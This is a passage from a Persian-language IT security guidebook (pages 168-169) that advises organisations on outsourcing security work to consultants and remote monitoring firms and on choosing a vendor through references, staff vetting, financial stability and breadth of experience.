‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺷﺮﻛﺘﻲ ﺗﺄﺳﻴﺲ ﻛﻨﻴﺪ ﻭ ﺗﻮﺍﻧﺎﺋﻴﻬﺎﻱ ﺧﻮﺩ‬
‫ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺴﺎﻧﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﻗﺒﻴﻞ ﺷﺮﻛﺘﻬﺎ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﺷـﻐﻠﻲ ﻣﻬﻤـﻲ ﭘﻴـﺪﺍ ﻣـﻲﺷـﻮﺩ؛‬
‫ﭼﺮﺍﻛﻪ ﺩﺭ ﺳﻄﺢ ﺩﻧﻴﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺘﻮﺍﻧـﺪ ﺟﻮﺍﺑﮕـﻮﻱ ﺗﻤـﺎﻣﻲ ﻧﻴﺎﺯﻫـﺎﻱ ﺻـﻨﺎﻳﻊ ﻭ‬
‫ﺩﻭﻟﺘﻬﺎ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﺎﺷﺪ‪ .١٠١‬ﻟﺬﺍ ﺩﺭ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻏﺮﺏ‪ ،‬ﻳﻚ ﺍﻧﻔﺠﺎﺭ ﺩﺭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺧـﺪﻣﺎﺕ‬
‫ﻣـﺸﺎﻭﺭﺍﻥ ﻭ ﻣﻨــﺎﺑﻊ ﺧـﺎﺭﺟﻲ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑـﻪ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺑــﺎ‬
‫ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺑﺮﺍﻱ‬
‫ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻗﺎﺑـﻞ ﻭﺍﮔـﺬﺍﺭﻱ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﺩﺭﺟـﻪﻳـﻚ ﻭ‬
‫ﻣﻤﺘﺎﺯ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺮﺧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻛـﺎﺭ ﺧـﻮﺩ ﺍﺯ ﺗﺨـﺼﺺ ﺑـﺎﻻﻳﻲ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺿﻌﻴﻒ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ‬
‫ﻭﺿﻌﻴﺖ ﺍﻳﻦ ﺷﺎﺧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺑـﺎ ﻳـﻚ ﻧﮕـﺎﻩ‬
‫ﺿﻌﻒ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺗـﺎﺯﻩﻛـﺎﺭ ﺗﻬﻴـﻪ ﺷـﺪﻩﺍﻧـﺪ ﺭﺍ‬
‫ﺗﺸﺨﻴﺺ ﺩﺍﺩ‪.‬‬
‫‪١٦٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺁﻳــﺎ ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﺧــﻮﺩ ﻭ ﺑــﺎ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻴﺪ؟‬
‫ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﻓﻘﻂ ﺑﻪ ﻣﺸﺎﻭﺭﺍﻧﻲ ﻧﻴﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻓﺮﺍﻣﻮﺵ ﻧﺸﺪﻥ ﻳﻚ ﻣـﺴﺌﻠﻪ ﻣﻬـﻢ‪ ،‬ﻋﻤﻠﻴـﺎﺕ‬
‫ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ‪.‬‬
‫ﺷﺎﻳﺪ ﺧﻮﺩﺗﺎﻥ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭﻟﻲ ﻧﮕﺮﺍﻥ‬
‫ﺯﻣﺎﻥ ﻛﻢ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺑﺤﺮﺍﻥ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻱ ﻳﻚ ﺷﺮﻛﺖ ﺑﻪ ﺑﺎﺯﺍﺭ ﺑﺮﻭﻳـﺪ‬
‫ﭘﺲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺟﻠﺐ ﻫﻤﻜﺎﺭ ﹺ‬
‫ﺗﺎ ﭼﻨﺪ ﭘﻴﻤﺎﻧﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ )ﺗﻤﺎﻡ ﻭﻗﺖ ﻭ ﻳﺎ ﭘـﺎﺭﻩ ﻭﻗـﺖ( ﺑـﻪ‬
‫ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﺑﻔﺮﺳﺘﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴـﺪ ﺍﺯ ﺧـﺪﻣﺎﺕ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﻭﺍﻛﻨﺶ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ١٠٢‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬـﺎ‬
‫ﺑﺮ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﺍﺷـﻜﺎﻝ ﺑـﻪ ﺷـﻤﺎ‬
‫ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺷﺎﻳﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺗﻤﺎﻡ ﻭﻗﺖ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ ﻳـﺎ ﻧﻴـﺎﺯﻱ ﺑـﻪ‬
‫ﭼﻨﻴﻦ ﻛﺴﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻋﻘـﺪ‬
‫ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﻳﻚ ﺷﺮﻛﺖ ﻣـﺸﺎﻭﺭﻩ ﻭ ﻧﻈـﺎﺭﺕ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ‬
‫ﺧﺪﻣﺎﺕ ﻛﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻧﻴﺎﺯﺗﺎﻥ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﺪ ﻭ ﻧﻴﺰ ﻣﻘﺮﻭﻥ‬
‫ﺑﻪ ﺻﺮﻓﻪﺗﺮ ﺑﺎﺷﺪ‪.‬‬
‫ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﻮﺍﺭﺩ ﻓـﻮﻕ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺪﺍﻧﻴـﺪ‬
‫ﻧﻴﺎﺯﻫﺎﻳﺘﺎﻥ ﭼﻴﺴﺖ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺁﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﻛﺪﺍﻡ ﻧﻴﺎﺯﻫﺎﻳﺘـﺎﻥ‬
‫ﭘﺎﺳﺦ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﻤﻴـﺸﻪ ﺳـﺎﺩﻩ ﻧﻴـﺴﺖ‪ ،‬ﭼﺮﺍﻛـﻪ ﺗـﺎ‬
‫ﻭﻗﺘﻲ ﺗﺠﺮﺑﺔ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﻭ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺧﻮﺩ‬
‫ﺭﺍ ﺧﻮﺏ ﻧﺸﻨﺎﺧﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺭﺍ ﻧﻤﻲﺩﺍﻧﻴﺪ‪.‬‬
‫ﺍﻧﺘﺨﺎﺏ ﻓﺮﻭﺷﻨﺪﻩ‬
‫ﻣﻮﻓﻘﻴﺖ ﺷﻤﺎ ﺩﺭ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺛﺎﻟﺚ ﺗـﺎ‬
‫ﺣﺪ ﺯﻳﺎﺩﻱ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻳﺎ ﺍﻓﺮﺍﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﻳﻨﻜﺎﺭ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ‪.‬‬
‫ﻳﻚ ﺭﺍﻫﻨﻤﺎ ﺑﮕﻴﺮﻳﺪ ﻭ ﺭﻭﻱ ﻣﻌﺮﻓﻬﺎ ﭘﺎﻓﺸﺎﺭﻱ ﻛﻨﻴﺪ‬
‫ﺑﻪ ﻋﻠﺖ ﺗﻨﻮﻉ ﺯﻳﺎﺩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ‪ ،‬ﻳﻜﻲ ﺍﺯ ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ‬
‫ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ‪ ،‬ﭘﺮﺳﻴﺪﻥ ﺍﺯ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺁﺷـﻨﺎ ﻭ‬
‫ﻣﺸﺎﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﺸﻪ ﭘﻴﺪﺍ ﻛـﺮﺩﻥ‬
‫ﻳﻚ ﻣﻌﺮﻑ ﺧﻮﺏ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴـﺴﺖ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﻳـﺎ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳـﺸﮕﺎﻩ ﺗﺠـﺎﺭﻱ ﭘﻴـﺪﺍ‬
‫‪102 Remote Monitoring and Response Firm‬‬
‫ﻛﺮﺩﻩﺍﻧـﺪ‪ ،‬ﻳـﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ ﺩﺭ ﻣﻘـﺎﻻﺕ ﺧﺒـﺮﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻣﻄـﺎﻟﺒﻲ‬
‫ﺧﻮﺍﻧﺪﻩﺍﻧﺪ‪ ،‬ﻭ ﻳﺎ ﭘﺲ ﺍﺯ ﻳﻚ ﺗﻤﺎﺱ ﺳﺎﺩﺓ ﺗﻠﻔﻨﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ‬
‫ﻭﺍﺳﻄﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻧﺎﻥ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺷﺮﻛﺖ ﺛﺎﻟﺚ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺟﺎﻳﮕـﺎﻫﻲ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳـﻨﮕﻴﻨﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﻭﺍﺭﺩ‬
‫ﺁﻭﺭﺩ‪ .‬ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻴﺮﻭﻧﻲ ﺑﺴﻴﺎﺭ ﺍﻣﺎﻧﺘﺪﺍﺭ‬
‫ﻭ ﺷﺎﻳﺴﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺩﺭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ‬
‫ﻛﻨﻴﺪ ﻭ ﺁﻥ ﻛﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﻣﻄﻠﻮﺏ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗـﺎ‬
‫ﻣﺎﻫﻬﺎ ﺑﻌﺪ ﻛﻪ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺁﻥ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ ‪ -‬ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﺎﻳﺪ‬
‫ﺭﺍﺑﻄﺔ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺷﺮﻛﺖ ﭘﺎﻳﺎﻥ ﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ ‪ -‬ﻣﺘﻮﺟﻪ ﺁﻥ ﺍﺷـﻜﺎﻝ‬
‫ﻧﺸﻮﻳﺪ‪.‬‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﻗﺘﻲ ﻳﻚ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ ﻫﻤﻜـﺎﺭﻱ ﺩﺭﻧﻈـﺮ‬
‫ﻣﻲﮔﻴﺮﻳﺪ ﺑﺎﻳﺪ‪:‬‬
‫ﻣﻌﺮﻓﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬
‫ﺑﺪﻧﺒﺎﻝ ﻣﻌﺮﻓﻬﺎﻱ ﺣﺮﻓﻪﺍﻱ ﺑﮕﺮﺩﻳﺪ ﻛﻪ ﺷـﺨﺺ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻲ ﺭﺍ‬
‫ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﻣﺸﺎﺑﻪ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺪﻧﺒﺎﻝ ﺁﻥ ﻫـﺴﺘﻴﺪ‬
‫ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻓﺮﺍﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬
‫ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺗﺎﻥ ﺑﻪ ﺷﻤﺎ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺑـﺎ‬
‫ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻣﺒﺤﺚ ﻭ ﺩﺭ ﺑﺨﺶ "ﺍﻓـﺮﺍﺩ" ﺷـﺮﺡ‬
‫ﻣﻲ ﺩﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ ﻣـﻮﺭﺩ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ‬
‫ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﻣﻲ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﭘﺮﻭﮊﺓ ﺷﻤﺎ ﺭﺍ ﺗﺎ ﭘﺮﺩﺍﺧـﺖ‬
‫ﻗﺴﻂ ﺍﻭﻝ ﻫﺰﻳﻨﺔ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻣﺤﺘﺎﻃﺎﻧﻪ‬
‫ﻋﻤﻞ ﻛﻨﻴﺪ‪.‬‬
‫ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺗﺪﺍﻡ ﻓﻌﺎﻟﻴﺖ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﭘﺮﻭﮊﺓ ﺑﻠﻨﺪﻣﺪﺕ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺴﺘﻪﺍﻳﺪ ﺑﺎﻳـﺪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺷﺮﻛﺖ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺗﻤﺎﻡ ﻣـﺪﺕ‬
‫ﻝ ﻗﺮﺍﺭﺩﺍﺩ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷـﺖ‪ .‬ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﻳـﻦ‬
‫ﻃﻮ ﹺ‬
‫ﻧﻴــﺴﺖ ﻛــﻪ ﺷــﻤﺎ ﻧﺒﺎﻳــﺪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺮﻛﺘﻬﺎﻱ‬
‫ﺗﺎﺯﻩﺗﺄﺳﻴﺲ ﻣﻮﺍﻓﻘﺖ ﻛﻨﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ‬
‫ﻣﺮﺑﻮﻃـﻪ ﻭﺍﺟــﺪ ﻣــﺪﻳﺮﻳﺖ ﻭ ﭘـﺸﺘﻮﺍﻧﺔ ﻣــﺎﻟﻲ ﻻﺯﻡ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ‬
‫ﺗﻌﻬﺪﺍﺗﺶ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﻧﺮﺧﻬﺎﻱ‬
‫ﭘﺎﺋﻴﻦ ﻫﺴﺘﻨﺪ ﺍﺟﺘﻨـﺎﺏ ﻛﻨﻴـﺪ؛ ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﻧﺘﻮﺍﻧﻨـﺪ ﺑـﺎ ﻓـﺮﻭﺵ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺧﺮﻳﺪ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ‬
‫ﻛﻨﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺳﻌﻲ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﺍﺯ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﭘﻮﻝ ﺭﺍ ﺑﺪﺳﺖ‬
‫‪١٦٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺁﻭﺭﻧﺪ ﻭ ﻟﺬﺍ ﺧﺪﻣﺎﺕ ﻫﺮﭼﻨﺪ ﺳﻄﺢ ﺑﺎﻻﻱ ﺁﻧﻬﺎ ﺩﺭ ﺟـﺎﻱ ﺩﻳﮕـﺮ ﻭ‬
‫ﺷﺎﻳﺪ ﺣﺘﻲ ﺗﺠﺎﺭﺕ ﺩﻳﮕﺮﻱ ﻣﺘﻤﺮﻛﺰ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﮔﺴﺘﺮﺩﮔﻲ ﺗﺠﺎﺭﺏ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‬
‫ﺷﻤﺎ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻋﻤﺪﺓ ﺗﺠﺮﺑـﻪ‬
‫ﺁﻧﻬﺎ ﻣﺮﺑﻮﻁ ﻳﻚ ﻧﻮﻉ ﻣﺸﺘﺮﻱ ﻳﺎ ﻳﻚ ﺑﺴﺘﺮ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ‬
‫ﺍﺳﺖ ﻣﺤﺘﺎﻃﺎﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺁﻧﻜﻪ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ‬
‫ﺩﻗﻴﻘﹰﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﻣﻲﺩﻫﺪ ﻣﻄﺎﺑﻘـﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﺳﹰﺎ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺭﺍ ﺑﻪ ﺍﺩﺍﺭﺍﺕ‬
‫ﭘﻠﻴﺲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺳﻴـﺴﺘﻢ ‪Microsoft Windows‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻳﻚ ﺷـﺮﻛﺖ ﺩﺍﺭﻭﻳـﻲ ﻛـﻪ‬
‫ﺗﺮﻛﻴﺒــﻲ ﺍﺯ ‪ Windows‬ﻭ ‪ Unix‬ﺭﺍ ﺑﻜــﺎﺭ ﮔﺮﻓﺘــﻪ ﺍﻧﺘﺨــﺎﺏ‬
‫ﻣﻨﺎﺳﺒﻲ ﻧﺒﺎﺷﺪ‪ .‬ﮔﺴﺘﺮﺓ ﺗﺠﺎﺭﺏ ﺷﺮﻛﺖ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺁﻧﻘﺪﺭ ﻓﺮﺍﮔﻴﺮ ﻧﺒﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺧﺪﻣﺎﺕ ﺳﻴﺎﺳﺘﻲ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤﻴﻂ ﻛﺎﺭﻱ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻧﻜﺘﻪ‬
‫ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻧﻴﺴﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﺎ ﺳـﻮﺍﺑﻖ ﻛـﺎﺭﻱ ﺩﺭ ﻳـﻚ ﺣـﻮﺯﺓ‬
‫ﺧﺎﺹ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺭﻧﻤﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ؛ ﺍﻣـﺎ‬
‫ﺷﻤﺎ ﺑﺎﻳﺪ ﻣﺤﺘﺎﻁ ﺑﺎﺷﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺷـﻮﺍﻫﺪ ﺭﻭﺷـﻨﻲ ﺑـﺮﺍﻱ‬
‫ﺗﺄﻳﻴﺪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﺣﺪﺍﻗﻞ ﺑﺎﻳﺪ ﺑﺎ ﻣﺴﺎﺋﻞ ﺯﻳﺮ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪:‬‬
‫‪103 “All in One” Contracts‬‬
‫•‬
